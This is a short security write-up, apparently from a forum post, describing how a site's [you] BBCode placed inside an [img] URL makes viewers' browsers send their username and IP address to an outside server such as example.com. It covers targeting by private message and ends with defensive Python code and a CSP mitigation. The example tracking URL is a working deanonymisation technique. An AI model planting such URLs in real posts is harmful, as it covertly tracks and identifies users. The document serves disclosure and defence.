“One of the BBCodes this site uses is [you]. If you place this in a forum post or a private message, it will insert the logon name of the user that is viewing the page. If my username was ‘Randomusername’, and someone sent me a private message saying ‘Hello [you]!’, when I opened it, the BBCode would translate to ‘Hello Randomusername!’”
“When you add [you] on the end of an image, you get something like this http://example.com/photo.php?u=[USERNAME_OF_PERSON_VIEWING].jpg.”
TL;DR: Use of the [img] and [you] BBCodes together, the latter of which gets converted into the viewing user’s username, so the image URL becomes unique to whoever opens the page.
The server at example.com then logs the username and IP address of the viewer.
Private messages can be used to target specific people with this attack even where the [you] BBCode does not work, since the sender already knows who will open the message and can put a recipient-specific image URL in it.
Workaround: Use Content-Security-Policy to restrict img-src to approved image hosts, or proxy images over your own servers.
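As an added example (not code from the original post or the forum software it describes), here is a minimal Python sketch of both rendering orders: the naive one substitutes [you] before expanding [img] and so produces exactly the per-viewer tracking URL described above; the hardened one expands [img] and [you] in a single pass, so a [you] inside an image URL is never substituted, and routes any non-approved host through a same-origin proxy so the third party sees the server’s address rather than the viewer’s. The allow-list host, the /imgproxy endpoint and the CSP value are assumptions.

```python
import html
import re
from urllib.parse import urlencode, urlsplit

# Constructed allow-list and hypothetical same-origin proxy endpoint (assumptions).
APPROVED_IMAGE_HOSTS = {"images.forum.example"}
IMAGE_PROXY = "/imgproxy?"

IMG_RE = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
YOU_RE = re.compile(r"\[you\]", re.IGNORECASE)
# One regex for both tags: a [you] sitting inside [img]...[/img] is swallowed by
# the url group and therefore never reaches the [you] branch.
TOKEN_RE = re.compile(r"\[img\](?P<url>.*?)\[/img\]|(?P<you>\[you\])",
                      re.IGNORECASE | re.DOTALL)


def render_naive(bbcode, viewer):
    """Vulnerable order: [you] is expanded first, so it also lands inside [img] URLs
    and the viewer's own browser fetches a URL carrying the viewer's name."""
    text = YOU_RE.sub(viewer, bbcode)
    return IMG_RE.sub(lambda m: f'<img src="{m.group(1)}">', text)


def image_src(url):
    """Map an [img] URL to a src that reveals nothing about the viewer: approved
    hosts are embedded directly, everything else is fetched through our proxy."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None  # drop javascript:, data:, scheme-relative and malformed URLs
    if parts.hostname in APPROVED_IMAGE_HOSTS:
        return url
    return IMAGE_PROXY + urlencode({"url": url})


def render_hardened(bbcode, viewer):
    """Safe order: image and [you] tokens are resolved in one pass, so the
    viewer's name can only ever appear in text, never inside a URL."""
    def expand(m):
        if m.group("you"):
            return html.escape(viewer)
        src = image_src(m.group("url").strip())
        return "" if src is None else f'<img src="{html.escape(src, quote=True)}">'
    return TOKEN_RE.sub(expand, bbcode)


def content_security_policy():
    """Defence in depth: even if a renderer bug slips through, the browser will only
    load images from our own origin (the proxy) and the approved host."""
    return "img-src 'self' https://images.forum.example"
```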